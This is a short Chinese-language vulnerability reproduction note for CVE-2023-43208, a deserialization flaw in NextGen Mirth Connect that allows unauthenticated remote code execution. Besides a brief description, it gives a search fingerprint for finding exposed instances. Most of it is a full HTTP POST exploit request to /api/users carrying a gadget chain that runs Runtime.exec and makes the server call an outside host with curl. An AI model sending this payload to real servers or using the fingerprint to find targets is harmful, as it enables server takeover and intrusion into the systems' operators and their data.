# NextGen Mirth Connect XStream存在反序列化远程代码执行漏洞 # 一、漏洞简介 NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208),未经身份验证的远程攻击者可利用此漏洞写入后门文件,执行任意命令,导致服务器被控。 # 二、影响版本 + `title="Mirth Connect Administrator"` + 特征 ![1729961516962-8e84d6cc-c576-4699-a794-37e8bd889d3f.png](./img/Ahlw4YbNSt6U5uWR/1729961516962-8e84d6cc-c576-4699-a794-37e8bd889d3f-547025.png) # 三、漏洞复现 ```plain POST /api/users HTTP/1.1 Host: X-Requested-With: OpenAPI Content-Type: application/xml abcd java.lang.Comparable java.lang.Runtime getMethod java.lang.String [Ljava.lang.Class; getRuntime invoke java.lang.Object [Ljava.lang.Object; exec java.lang.String curl http://jveuewgzdi.iyhc.eu.org transform compareTo ``` ![1729961537056-5c897bff-09cb-489d-bb3e-72cb9f1812f0.png](./img/Ahlw4YbNSt6U5uWR/1729961537056-5c897bff-09cb-489d-bb3e-72cb9f1812f0-384661.png) > 更新: 2024-11-27 10:01:46 > 原文: